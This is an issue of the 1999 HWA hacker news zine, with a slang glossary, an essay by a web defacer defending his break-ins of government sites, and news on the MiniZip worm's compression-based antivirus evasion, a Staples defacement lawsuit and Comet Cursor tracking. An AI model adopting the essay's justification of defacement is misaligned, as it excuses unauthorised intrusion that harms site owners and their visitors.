As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more.
The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============

NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice), is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, viruses, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list.

While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware.
The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors.

SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net

Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

__ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net ..............:
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 What's in a name? Why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this ain't fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??
*CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin' way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS - Oh for christ's sakes

PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates:
  H - hacking, hacktivist
  C - Cracking
  C - Cracking
  V - Virus
  W - Warfare
  A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
  P - Phreaking, "telephone hacking" PHone fREAKs ...
  CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh.
- Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker

Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #sesame

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, let's give the message board a bit more use eh? I'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

==============================================================================

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /*
     * Short issue this week, I'm still sick
     * so haven't put as much time as I usually do
     * into digging up info and etc, hopefully be
     * back to normal next week...
     *
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net

complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start

____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__|

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 Yes It Is (Worth It)
     ~~~~~~~~~~~~~~~~~~~~

contributed by ytcracker

Active web page defacer YTCracker has written an article in response to Brian Martin's article Is It Worth IT, published by HNN last week. Mr Martin asked if the recent spate of web page defacements was worth the trouble it causes the perpetrators. YTCracker has recently defaced such high profile pages as Bureau of Land Management National Training Center and the Defense Contracts Audit Agency. YTCracker now explains the motivation and says that, Yes, it is worth it.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html

HNN Cracked Pages Archive - Some of YTCracker's work is displayed here.
http://www.hackernews.com/archive/crackarch.html

"Yes, it is."

A response to Brian Martin's Is it worth it? article.

By YTCracker (phed@felons.org)

This article was written in response to an article written by Brian Martin concerning web page defacement, its risks, and its consequences. He asks the eternal question "Is it worth it?" to those who participate in these kinds of activities. Many of the individuals I have talked to have mixed thoughts about the article. Some individuals say it really taught them something valuable. Some said it scared them into considering quitting. Others, including myself, carry a somewhat apathetic attitude toward the whole thing in general. Allow me to explain.

A few things need to be established about this defacement culture. One, I believe that this in no way constitutes hacking. On any level, no matter how you look at it, web page defacement is destructive. In some cases, it can ruin the credibility of a company or a government agency. Two, I believe that web page defacement should carry a "message". When I spoke with Brian earlier, I tried to make it clear that we [as third person onlookers to a defacement] cannot determine this message in some cases. To us, "hack0r x 0ens u in 9d9" probably means nothing at all. To hack0r x, it may have. However, I personally believe that if hack0r x is going to break into this page and disrupt their message, his better be worthwhile. Thirdly, I believe that there is a "whiter" side to defacement. This side operates within definitive ethical boundaries and attempts to make web page cracking as non-malicious as possible. I do my best to have the ability to define myself under this ethical side. I back everything up. I leave the administrator information on how to fix the security hole. I don't disrupt the flow of information - I leave a link to the original page in plain sight.
While these factors don't guarantee my immunity, they surely aren't raising any eyebrows and leading people to contemplate my threat to national security. I am not concerned with leaving messages like "fuq da fedz in 9d9 suk0r my nutsaq." That, frankly, is asking for trouble. It also serves no purpose.

Why do I do it? There are a few key reasons. I am sure that everyone out there that contributes to this scene has their own.

First off, I am seventeen [before I go any further, I am referring to seventeen as "kid", not "a minor and therefore will receive lesser penalty"]. As a young member of society oftentimes I find that my voice goes unheard. In a book titled Rise and Fall of the American Teen by Thomas Hine [NPR broadcast], the theory is presented that the proverbial "teenager" did not exist until the 1930s. Until that time, teenagers were too busy supporting the family, getting married, and having children. Nowadays, if I were to write my senator, correct my teacher, or start a business, people automatically assume that I am incapable. This is a stereotype that I have not established for myself; other teenagers have given me a reputation unbefitting of who I really am. By defacing a website, people have to listen. The volume of people that visit the site as it is defaced combined with the volume of people that view it mirrored is immense. Therefore, I have effectively gotten my message out, and people can choose to listen to it or not. If this sounds extremely selfish, I agree. The twist comes in the questions that people ask themselves. For instance, one of my motivations is enlightening system administrators. There has been many a case where I have noticed a vulnerability, mailed the admin, and his/her cockiness resulted in ignoring my warning. Two or three days later, I see this admin's page on the mirror. Sometimes, the best way to inform someone is to show them. Seeing is believing.
The point is, if I can get at least one of the hundred people that see that site, including the administrator, to realize that security isn't all it's cracked up to be and change their views, I have done my job. This line of thought is very common in the heads of most defacement practitioners.

Second, I am a graffiti artist. I throw burners on walls and trains. I have run with some infamous crews. I do not represent the "tagging" aspect [for the uninitiated, the equivalent of "b0n3r oenz u" on a defacement]. I strongly feel that graffiti can be very artistic and carry a very strong message if done correctly. People will pass by your piece and either love it or hate it. For that moment they take their mind off of their jobs, their children, their lives and they contemplate what they are looking at. This is very much so the purpose of web defacement in my eyes.

Third, I don't care. I can't care. I haven't been raided, haven't stared down a lawman's gun, and haven't been investigated for computer crime. If any of these were to happen to me, I have no doubt in my mind I will see things in a different light. This ignorance is obviously not very healthy. I have weighed the consequences and see very little in favor of me stopping. I will most likely continue to deface until it gets old, I have nothing else to say, or simply don't have time. I would argue that ninety percent of web page defacements fall under this mindset. This is sad, but true. This is not to say that I or anyone else isn't aware of the rules. That assumption is far from the truth. What it means is that we are basically carefree in the sense that we could be arrested and still feel good about ourselves. ;)

In a sense, it isn't worth it. There are only a few of us singlehandedly cracking with good intentions. The rest of the scene is too busy talking shit to each other or rm -rfing everything they can that there is a stereotype affiliated.
As aforementioned, stereotypes are the ultimate backpedal to anything we accomplish. Just as teenagers are ignored and pigeonholed, everyone who totes a computer and investigates security will be labeled a threat.

What does make it worth it? Arguably, the few who carry on the tradition. PHC and Narcissus - using their defacements as a political tool. DHC - putting an interesting poetic twist to their cracks. ULG - for making BIG statements on BIG sites. Last but not least, v00d00 - for his cynical views and unique style. There are others, no doubt, but these guys definitely take the cake for originality and style - they have my respect.

So next time you see my name or anyone else's pop up on attrition and wonder why we do it, think back to this article. Is it worth it? You decide.

YTCracker (phed@felons.org)
(c)1999 YTCracker and seven one nine

@HWA

04.0 ExplorerZip Shrinks, Becomes MiniZip
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

By applying a simple compression scheme (Neolite) to the well known destructive virus WormExplorer it is possible to sneak the old worm by antivirus software. This 'new' version of WormExplorer is being called MiniZip. The worm uses MAPI-capable e-mail programs to propagate, such as Microsoft Corp.'s Outlook, Microsoft Corp.'s Outlook Express and Microsoft Corp.'s Exchange. At least twenty companies and several thousand systems have been infected so far. (It is pretty sad that with today's technology a simple compression routine is enough to bypass antivirus technology. Pattern detection is not the answer. Sure hope the AV companies have something better up their sleeves.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2402114,00.html?chkpt=zdnntop

MSNBC
http://www.msnbc.com/news/341096.asp

Associated Press - via Baltimore Sun
http://www.sunspot.net/cgi-bin/gx.cgi/AppLogic+FTContentServer?section=cover&pagename=story&storyid=1150180206405

MiniZip a nasty, small clone of ExploreZip
New virus compresses ExploreZip code to evade anti-virus software, bites at least a dozen companies.
By Jim Kerstetter, PC Week
UPDATED December 1, 1999 9:04 AM PT

They call it MiniZip. Virus researchers at Network Associates Inc. (Nasdaq: NETA), Symantec Corp. (Nasdaq: SYMC) and Trend Micro Inc. warned Tuesday evening that a new version of the ExploreZip virus, which wipes out information on a hard drive, has hit at least 12 companies so far, six of them high-tech manufacturing companies. Several thousand PCs are believed to have been hit.

The ExploreZip variant, also called ExploreZip.worm.pak, is 120KB, about half the size of its predecessor. But other than its diminutive size, MiniZip acts exactly like ExploreZip, which wipes out files on hard drives and can spread via e-mail.

Compression conundrum

MiniZip is so small because the virus's author compressed the original ExploreZip code. Compressing it changes the bits, meaning that anti-virus software has trouble identifying the new virus. MiniZip first appeared last week, so most anti-virus makers have updated their software to detect its code. While anti-virus makers issued notice of the new updates, it appears that many companies have not updated their anti-virus software, allowing Tuesday's outbreak.

What to look for

ExploreZip, the "father" of MiniZip, was first reported on June 11. To propagate, the worm uses MAPI-capable e-mail programs, such as Microsoft Corp.'s Outlook, Outlook Express and Exchange. It e-mails itself out as an attachment with the filename "zipped_files.exe."
The body of the e-mail message looks like it came from a regular e-mail correspondent and says: "I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs."

Once it's launched, MiniZip launches the original Worm.ExploreZip routine. It looks for any drives mapped to the infected computer and spreads to them. It also looks for unread e-mail and automatically replies to them, in search of new victims.

"That's why it has spread so rapidly now, but didn't at first," said Vincent Weafer, director of the Symantec Antivirus Research Center. "This is exactly how ExploreZip spread."

MiniZip may display an error message informing the user that the file is not a valid archive, according to the anti-virus companies. The worm copies itself to the c:\windows\system directory with the file name "Explore.exe" and then modifies the WIN.INI file so that the virus launches each time Windows is started.

Associated Press;

Computer virus devouring files
The Associated Press

SAN FRANCISCO (AP) — Experts scrambled to warn thousands of computer users that a familiar and damaging virus has struck scores of companies and could be slumbering in their e-mail inboxes.

The Mini-Zip virus tore through computers on Tuesday, devouring files and crippling e-mail systems, anti-virus analysts said. It was expected to renew its assault today as unsuspecting users logged on.

Dan Schrader, vice president of new technology at Trend Micro in Cupertino, Calif., said he fielded complaints of significant problems from four Fortune 500 companies and scores of smaller companies. Sal Viveros, a marketing manager for Santa Clara-based Network Associates, which makes anti-virus software, said 20 large corporations had been affected by Tuesday evening. The experts refused to release the names of affected companies.

Mini-Zip's parent bug, Worm.Explore.Zip, struck last summer. It was considered the most destructive virus since the Melissa outbreak in the spring.
``The last time this virus came along it affected tens of thousands — maybe hundreds of thousands of computers — and caused millions of dollars in damage,'' Schrader said. ``It's malicious and fast-spreading. We consider this to be high-risk.''

It wasn't clear whether the problem had been reported to the government-chartered CERT Coordination Center — formerly the Computer Emergency Response Team — at Carnegie Mellon University in Pittsburgh. There were no warnings on its Web site early today.

Anti-virus experts said the bug gets loose from an infected system as a seemingly friendly reply to a clean e-mail sent via the Microsoft Outlook, Outlook Express or Exchange browsers. The virus intercepts the original message and automatically sends itself as a response — even changing the subject line from, for example, ``Work Meeting'' to ``Re: Work Meeting.''

The body of the message reads: ``Hi (recipient's name)! I received your e-mail and I shall send you an e-mail ASAP. Till then, take a look at the attached zipped docs. bye.''

The e-mail contains an attachment called ``zipped_files.exe.'' If a user double-clicks on the attachment, the virus is set loose in the new victim's system. It then destroys a series of files in a computer's hard drive by replacing them with empty files.

Anti-virus experts cautioned users against opening e-mails if they do not know the sender or why they were sent. They said the virus could be fought with updated anti-virus software.

Originally published on 12/01/1999

@HWA

05.0 Staples Files Suit Against Unknown Defacer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Staples Inc. has filed a lawsuit in US District Court in Boston charging that "John Doe," an unidentified cyber intruder, illegally accessed the company's Web site and damaged the company by stealing e-commerce business. The defacement, which occurred on October 9th, featured advertisements for products at Home Depot.
Staples hopes to identify the intruder shortly. (How do you sue an unknown person?)

Boston Globe
http://www.globe.com/dailyglobe2/334/business/Staples_files_suit_against_Web_hacker+.shtml

Associated Press
http://library.northernlight.com/EB19991130960000057.html?cb=0&dx=1006&sc=0#doc

Staples files suit against Web hacker
By Shelley Murphy, Globe Staff, 11/30/99

Shopping on line may be the best way to avoid holiday crowds, but customers visiting Staples's Web site one day last month encountered a unique problem when they unwittingly found themselves in a competitor's store.

A hacker broke into the Framingham office-supply retailer's Internet site, www.staples.com, on Oct. 9 and posted advertisements for one of the company's major competitors, Office Depot. Shoppers clicking on Office Depot products were linked immediately to the home page of Staples's major competitor, which is based in Delray Beach, Fla.

Officials at Staples Inc. filed a lawsuit in US District Court in Boston yesterday charging that ''John Doe,'' the unidentified hacker, illegally accessed the company's Web site and damaged the company by stealing e-commerce business. The suit contends that the hacker is believed to live in or near Massachusetts and that the company expects to identify him shortly.

''We consider it highly unlikely that...our competitors were involved in any way,'' said Shannon Lapierre, public relations manager of Staples, speculating that the changes to the Web site may have been a prank.

But Staples, which just announced third-quarter Internet sales revenue of $24 million, is taking the Web-site intrusion seriously and is determined to identify the culprit and report him to federal authorities, Lapierre said.

Meanwhile, federal authorities have been on the lookout for Internet fraud. Federal law prohibits unauthorized access to a computer and calls for as much as 10 years in prison if damage is caused recklessly as a result of the breach.
''Obviously e-commerce is a very important part of our business and very important to the company,'' said Lapierre. Staples's goal is to have 1 million on-line customers and $1 billion in Internet sales by 2003, Lapierre said.

Staples, which did $7 billion in sales last year and which operates more than 1,000 office superstores, launched its Web site a year ago. While monitoring the site Oct. 9, officials noticed that products advertised throughout the Web site had been deleted and replaced with products bearing the Office Depot logo.

The suit said that the Office Depot advertisements contained links to the Florida company's Web site, meaning that Staples's shoppers who clicked on the illegally advertised products were redirected to the competitor's Web site. Shoppers were diverted from Staples to Office Depot for about an hour before the problem was corrected, Lapierre said.

In addition to lost business, Staples alleges that it cost the company time and money to repair its Web site and to determine the extent of the security breach.

Calls to Office Depot, the world's largest seller of office products, were referred to the company's vice president of public relations, who couldn't be reached for comment late yesterday.

Lapierre said the problems created by the hacker had never happened to Staples before. ''It's an interesting time we live in,'' she said.

Staples's stock rose yesterday to close at 23-13/16 in trading on the Nasdaq market. Office Depot closed at 11 1/2, down , on the New York Stock Exchange.

This story ran on page D01 of the Boston Globe on 11/30/99.
© Copyright 1999 Globe Newspaper Company.

Associated Press;

Story Filed: Tuesday, November 30, 1999 12:50 PM EDT

BOSTON (AP) -- Office supply store Staples has filed suit against an unnamed hacker who broke into its Internet site and posted advertisements that led Web browsers to the home page of one of its chief competitors.

In the suit filed Monday in U.S. District Court in Boston, Framingham-based Staples charged that the hacker, referred to as ``John Doe,'' illegally entered the site and damaged Staples by stealing e-commerce business. The suit claims that ``John Doe'' lives in or near Massachusetts, and that the company expects to identify him shortly.

The hacker broke into the Staples Internet site on Oct. 9 and posted advertisements for Office Depot. Shoppers who clicked on the Office Depot products were linked to the Office Depot home page. The problem was corrected after about an hour.

In the suit, Staples alleges that, aside from a loss of money, it cost time and money to find and fix the security breach. Staples officials speculated that changes to the Web page were a prank, and discounted the possibility that its competitors were behind it.

Gary Schweikhart, an Office Depot spokesman, said Tuesday the company was outraged by the computer hack and said Office Depot had no part in it. ``We're not that dumb and at the same time we would not condone any activity that is illegal and unethical,'' he said.

Federal law calls for a maximum of 10 years in prison if damage is caused as a result of unauthorized access to a computer.

Staples, which did $7 billion in sales last year, launched its Web site a year ago. The company hopes to have 1 million Internet customers and $1 billion in Internet sales by 2003, Lapierre said.

Copyright © 1999 Associated Press Information Services, all rights reserved.

@HWA

06.0 Comet bows to consumer pressure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Ted

Yesterday Comet Systems Inc. was accused of collecting data on consumers' web surfing practices with their free cursor changing software. The software, Comet Cursor, is installed on over 16 million systems and tracks web usage of over 60,000 web sites.
Following rampant consumer outcry over the practice, Comet Systems has agreed to allow consumers to delete the serial number used to track individual web surfing habits and will also seek certification from Truste, the industry privacy watchdog group. Truste's certification of Comet Systems could take 45 to 60 days.

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/1137191l.htm

Software firm in privacy flap
BY TED BRIDIS
Associated Press Writer

WASHINGTON (AP) -- A company that offers free software to change an Internet browser's computer cursor into cartoon characters promised Tuesday to let people delete a serial number the company was using to track customers across the Internet.

Responding to an outcry over the privacy implications of its software, Comet Systems Inc. also said it will seek certification from Truste, an organization that monitors whether Web sites are following the privacy promises they make to consumers. Truste said Comet Systems had ``significantly damaged the trust of their customers.''

New York-based Comet Systems acknowledged Monday that its cursor software -- used by more than 16 million people -- reports back to its own computers with each customer's unique serial number each time that person visits any of 60,000 Web sites that support its technology. Those sites include dozens aimed at young children, such as those for the Dilbert and Peanuts characters of United Feature Syndicate Inc. and the Ty Inc. site for Beanie Babies.

Comet said it never violated customers' privacy because it does not attempt to match its serial numbers against anyone's real-world identity. But it said Tuesday it will allow customers to delete those numbers, anyway, although the numbers helped Comet keep an accurate census of its customers for marketing and billing purposes. Some Web sites pay Comet based on the number of visitors using the cursor-changing technology.
Customers will be able to download a program starting Wednesday from Comet's Web site, at www.cometsystems.com, to replace their serial number with a meaningless number that isn't unique.

``If that's what we need to do to appease users, we'll do that,'' spokesman Ben Austin said.

Comet's certification to Truste could take 45 to 60 days. But that organization only monitors data collected at a company's Web site, not by its stand-alone software programs.

``We don't cover software privacy practices,'' Truste spokesman David Steer acknowledged Tuesday. ``Comet Systems has realized they have significantly damaged the trust of their customers, and they're looking at ways to rebuild that trust.''

Critics said earlier that the company should have more openly disclosed the behind-the-scenes transmissions, which are made without warning. They also said it would not be difficult given today's technology to begin correlating the Comet serial number with a consumer's identity if the company suddenly decided to or if Comet -- with its extensive tracking database -- were purchased by new owners willing to do that.

``The typical guy who goes to Best Buy and buys a computer and installs this software, he'll never know about this stuff,'' said programmer Dave Gale of Tampa, Fla. ``It's like a toy, but you wouldn't expect a toy to follow you around on the Internet.''

Steer, the spokesman for Truste, said other companies also undoubtedly are clandestinely monitoring the online behavior of their customers.

``I believe there are a lot of other software companies that are collecting personal information and not disclosing it,'' he said. ``That is just no longer acceptable.''

Internet discussion groups were filled Tuesday with messages from angry people who believed the cursor software did or could violate their privacy.
In a statement published on the company's Web site, Comet President Jamie Rosen said the company was ``quite surprised'' at the privacy questions because the software doesn't ask for a customer's name, e-mail address or other personal information.

``We deeply regret that this has caused concern among our users and we pledge to be a leader in the area of online privacy in the future,'' he said.

@HWA

